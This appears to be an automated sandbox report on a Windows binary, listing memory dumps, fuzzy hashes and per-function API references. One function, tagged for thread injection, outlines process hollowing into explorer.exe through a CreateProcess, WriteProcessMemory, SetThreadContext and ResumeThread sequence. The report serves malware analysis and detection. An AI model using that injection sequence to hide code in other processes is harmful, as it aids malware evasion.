                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b8a7c98a0782e6b5e21f603e02649a41459cd2475fc6240637aa34996f55e17d
                                                                                                                                                                          • Instruction ID: 720c58e1dad0af949beb7db1d980cc4aff5a885d51f04726ef07140645160bf4
                                                                                                                                                                          • Opcode Fuzzy Hash: b8a7c98a0782e6b5e21f603e02649a41459cd2475fc6240637aa34996f55e17d
                                                                                                                                                                          • Instruction Fuzzy Hash: A6419536700A44DFEB15CE98C9D0769B7A6FB8EB74F34007AE906D7712D6BAAC00D644
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004456C3, Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0f655bcf1c95378901d987d1d9b469e9a501cc10800333927b741c41f6420aaf
                                                                                                                                                                          • Instruction ID: 6fe91e2dd532c9ce6e0cf6ec768b83116016aaa074b7fee4a38832fc39333276
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f655bcf1c95378901d987d1d9b469e9a501cc10800333927b741c41f6420aaf
                                                                                                                                                                          • Instruction Fuzzy Hash: A741643A700A44DFEB16CE94C9D1B6577A6FB8EB64F34407AE90397712D6BAAC00D640
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00461A30, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                          • Instruction ID: e71acc89028824f00cb35457f343a2b36ae6b3787995ebe7eae03084bf073169
                                                                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F112BB724318243D744CAFDC4B45B7A7A5EBC6321B2DC37BD0418B774F22A9945960A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401C20, Relevance: 89.7, APIs: 44, Strings: 7, Instructions: 404timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401C7F
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00401CC2
                                                                                                                                                                            • Part of subcall function 004035C0: SysStringLen.OLEAUT32(?), ref: 004035CE
                                                                                                                                                                            • Part of subcall function 004035C0: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 004035E8
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000800,00000000,00000000,M-d-yyyy,00000000,00000080,?,00000080), ref: 00401D0A
                                                                                                                                                                            • Part of subcall function 00403460: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30), ref: 0040349F
                                                                                                                                                                            • Part of subcall function 00403460: GetLastError.KERNEL32(?,00000000,000000FF), ref: 00403539
                                                                                                                                                                            • Part of subcall function 00403460: SysFreeString.OLEAUT32(?), ref: 00403553
                                                                                                                                                                            • Part of subcall function 00403460: SysFreeString.OLEAUT32(?), ref: 00403560
                                                                                                                                                                            • Part of subcall function 00403460: SetLastError.KERNEL32(?), ref: 00403584
                                                                                                                                                                            • Part of subcall function 00403460: SetLastError.KERNEL32(?,?,00000000,74B04C30), ref: 0040358A
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401D31
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00401D65
                                                                                                                                                                            • Part of subcall function 004035C0: _wmemcpy_s.LIBCMT ref: 00403615
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000800,00000000,00000000,hh':'mm':'ss tt,00000000,00000080,?,00000080), ref: 00401DAA
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00402970: GetLastError.KERNEL32(CC858012), ref: 004029C4
                                                                                                                                                                            • Part of subcall function 00402970: SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402A20
                                                                                                                                                                            • Part of subcall function 00402970: GetLastError.KERNEL32(?), ref: 00402A68
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(?), ref: 00402A80
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(00000007), ref: 00402A8B
                                                                                                                                                                            • Part of subcall function 00402970: SetLastError.KERNEL32(?), ref: 00402AAB
                                                                                                                                                                            • Part of subcall function 00402D40: GetLastError.KERNEL32 ref: 00402DAB
                                                                                                                                                                            • Part of subcall function 00402D40: SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402E14
                                                                                                                                                                            • Part of subcall function 00402D40: SysFreeString.OLEAUT32(?), ref: 00402F06
                                                                                                                                                                            • Part of subcall function 00402970: GetLastError.KERNEL32(00000000,00000000,00000000,?), ref: 00402B36
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(?), ref: 00402B4C
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(00000007), ref: 00402B57
                                                                                                                                                                            • Part of subcall function 00402970: SetLastError.KERNEL32(?), ref: 00402B77
                                                                                                                                                                            • Part of subcall function 00402970: GetLastError.KERNEL32(00000000,00000000,000000FF,?,00000000), ref: 00402BC3
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(?), ref: 00402BD9
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(00000007), ref: 00402BE4
                                                                                                                                                                            • Part of subcall function 00402970: SetLastError.KERNEL32(?), ref: 00402C04
                                                                                                                                                                            • Part of subcall function 004026D0: GetLastError.KERNEL32 ref: 00402735
                                                                                                                                                                            • Part of subcall function 004026D0: SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402795
                                                                                                                                                                            • Part of subcall function 004026D0: GetLastError.KERNEL32 ref: 004027BE
                                                                                                                                                                            • Part of subcall function 004026D0: SetLastError.KERNEL32(?,00000000,00000000,000000FF), ref: 0040281E
                                                                                                                                                                            • Part of subcall function 004026D0: GetLastError.KERNEL32 ref: 0040283E
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,00000001,?,?,?,00000001), ref: 00401E67
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401E8B
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401E9E
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00401ED1
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401EE6
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401F04
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401F17
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00401F4A
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401F5F
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401F7D
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401F90
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00401FC3
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401FD8
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401FF6
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402009
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0040203C
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402051
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040206F
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402082
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004020B5
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004020CD
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00402120
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004021E5
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402203
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402216
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00402249
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040225E
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040227C
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040228F
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004022C2
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004022D1
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004022E9
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004022F6
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0040231A
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040232F
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402347
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402354
                                                                                                                                                                            • Part of subcall function 004033B0: __vwprintf_p.LIBCMT ref: 004033DF
                                                                                                                                                                            • Part of subcall function 004033B0: vswprintf.LIBCMT ref: 00403411
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00402378
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$String$Free$Format$AllocDateTime__vwprintf_p_wmemcpy_svswprintf
                                                                                                                                                                          • String ID: %s[%s]: %s$%s[%s]: %s -- File: %s, Line: %d$HsG$HsG$HsG$M-d-yyyy$hh':'mm':'ss tt
                                                                                                                                                                          • API String ID: 1002200784-3627406520
                                                                                                                                                                          • Opcode ID: d9f6bc8becd752235c8caee7071c7edb30dd1ebb7fd6927dc7de9455b369938c
                                                                                                                                                                          • Instruction ID: 9b39b70ce89a990f8f0f64f0581ea2f15988200d14acf875882281a00136e477
                                                                                                                                                                          • Opcode Fuzzy Hash: d9f6bc8becd752235c8caee7071c7edb30dd1ebb7fd6927dc7de9455b369938c
                                                                                                                                                                          • Instruction Fuzzy Hash: E712E170508380DFD731DF69C949B9ABBE1BF89308F01892DE98C972A1DB75A844CF56
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041DD7F, Relevance: 73.8, APIs: 41, Strings: 1, Instructions: 334windowtimeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041DD89
                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041DDF1
                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 0041DDF8
                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 0041DE1E
                                                                                                                                                                          • SendMessageW.USER32(00000405,00000000,00000000,000000D8), ref: 0041DE4E
                                                                                                                                                                          • PostMessageW.USER32(00000000,00008032,00000000,00000000), ref: 0041DEA3
                                                                                                                                                                          • SetWindowTextW.USER32(?,-00000004), ref: 0041DEFD
                                                                                                                                                                          • SetTimer.USER32(?,000003E9,000000FA,00000000), ref: 0041DF1F
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041DF2D
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041DF37
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041DF41
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0041DF56
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041DFA5
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0041DFB4
                                                                                                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 0041DFC9
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0041DFD0
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DFDB
                                                                                                                                                                          • ReleaseDC.USER32 ref: 0041DFF2
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041E16F
                                                                                                                                                                          • GetClientRect.USER32 ref: 0041E180
                                                                                                                                                                          • GetClientRect.USER32 ref: 0041E187
                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 0041E1A4
                                                                                                                                                                          • FillRect.USER32 ref: 0041E1B0
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0041E1B8
                                                                                                                                                                          • GetSysColorBrush.USER32(00000000), ref: 0041E1C5
                                                                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 0041E1D7
                                                                                                                                                                          • FillRect.USER32 ref: 0041E1FD
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0041E204
                                                                                                                                                                          • DeleteObject.GDI32(000000D8), ref: 0041E21B
                                                                                                                                                                          • DeleteObject.GDI32 ref: 0041E22C
                                                                                                                                                                          • DeleteObject.GDI32 ref: 0041E234
                                                                                                                                                                          • DeleteObject.GDI32 ref: 0041E23C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$DeleteItem$MessageRect$Send$BrushClientColorFillStock$CapsCreateCtrlDeviceH_prolog3_ModePostReleaseSolidTextTimerWindow
                                                                                                                                                                          • String ID: Tahoma
                                                                                                                                                                          • API String ID: 1993185436-3580928618
                                                                                                                                                                          • Opcode ID: 5c4f197cfb6684dc5efb2ff5eb40c1c11e7b5f109d394619101e4ad4a45c435b
                                                                                                                                                                          • Instruction ID: 7b900a788b441e3b98be6e7e0d8a344de872ee3235ffe873c199652462b8cc30
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c4f197cfb6684dc5efb2ff5eb40c1c11e7b5f109d394619101e4ad4a45c435b
                                                                                                                                                                          • Instruction Fuzzy Hash: F3C19475900314AFEB20AF65DC49FAA3BBDFB09701F01456AF60AA61A1CB784984CF5D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00410124, Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 356threadinjectionprocessCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,00000104,CC858012,?,00000000,00000000,00000000,0046269B,000000FF,?,0040CEEE,00000001,004A4DA0), ref: 004101A6
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00410277
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004102A0
                                                                                                                                                                          • _memset.LIBCMT ref: 004102BA
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,?,?,explorer.exe,?,00000001,?,00000000,00000040), ref: 00410318
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000104), ref: 00410373
                                                                                                                                                                            • Part of subcall function 00455724: GetLastError.KERNEL32 ref: 004557C3
                                                                                                                                                                            • Part of subcall function 00455724: GetLastError.KERNEL32 ref: 00455882
                                                                                                                                                                            • Part of subcall function 00455724: __CxxThrowException@8.LIBCMT ref: 004558F2
                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 0041041E
                                                                                                                                                                          • _memset.LIBCMT ref: 0041043F
                                                                                                                                                                          • _wcsncpy.LIBCMT ref: 004104A7
                                                                                                                                                                          • _wcsncpy.LIBCMT ref: 004104D5
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000), ref: 004104F3
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 004104F6
                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 004104F9
                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00410519
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00410525
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0041052D
                                                                                                                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0041053E
                                                                                                                                                                          • _memmove.LIBCMT ref: 00410552
                                                                                                                                                                          • GetThreadContext.KERNEL32 ref: 00410571
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,00000C35,00000040,?), ref: 004105B3
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000C35,00000000), ref: 004105CE
                                                                                                                                                                          • FlushInstructionCache.KERNEL32(?,?,00000C35), ref: 004105DC
                                                                                                                                                                          • SetThreadContext.KERNEL32(?,00010003), ref: 004105EF
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 004105FB
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00410607
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0041060F
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$HandleProcess$CloseString$CurrentDirectoryFileH_prolog3_Thread$ContextFreeH_prolog3_memset_wcsncpy$AllocCacheCreateDuplicateException@8ExistsFlushInstructionMemoryModuleMoveNamePathProtectResumeSystemTerminateThrowVirtualWindowsWrite_memmove
                                                                                                                                                                          • String ID: D$HsG$HsG$HsG$explorer.exe
                                                                                                                                                                          • API String ID: 3182427977-157562588
                                                                                                                                                                          • Opcode ID: fbd56c58dd2500631c223e230ab5adc3bcf9e33d32074cae6593865e24b63588
                                                                                                                                                                          • Instruction ID: 2184707281973d38a5ea42429bce48e9b07175d1878323ce6b8ec8686bc7d57a
                                                                                                                                                                          • Opcode Fuzzy Hash: fbd56c58dd2500631c223e230ab5adc3bcf9e33d32074cae6593865e24b63588
                                                                                                                                                                          • Instruction Fuzzy Hash: 43E15F71900258EFDB21EBA4CC85BDEBBB8AF14304F0041EAE549A7191DBB45BC8CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00402D40, Relevance: 51.1, APIs: 24, Strings: 5, Instructions: 356COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402DAB
                                                                                                                                                                          • SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402E14
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402F06
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402F19
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00402F4C
                                                                                                                                                                            • Part of subcall function 00403F20: GetLastError.KERNEL32 ref: 00403F7F
                                                                                                                                                                            • Part of subcall function 00403F20: SetLastError.KERNEL32(HsG), ref: 00403FB7
                                                                                                                                                                            • Part of subcall function 00403F20: GetLastError.KERNEL32(00000000,00000000,000000FF,?,00000000,00000000,?,00000002,00000001), ref: 00404090
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,000000FF,-00000004,?,00000001,?,00000000,?,000000FF,00000001), ref: 00403020
                                                                                                                                                                          • SetLastError.KERNEL32(HsG,00483E18,00000000), ref: 00403080
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403117
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040312A
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0040315D
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00403172
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040318A
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403197
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004031BB
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,000000FF,-00000004,?,00000001,?,00000000,?,000000FF,00000001), ref: 004031CE
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00403221
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00403236
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403254
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403267
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0040329A
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004032A9
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004032C1
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004032CE
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004032F2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
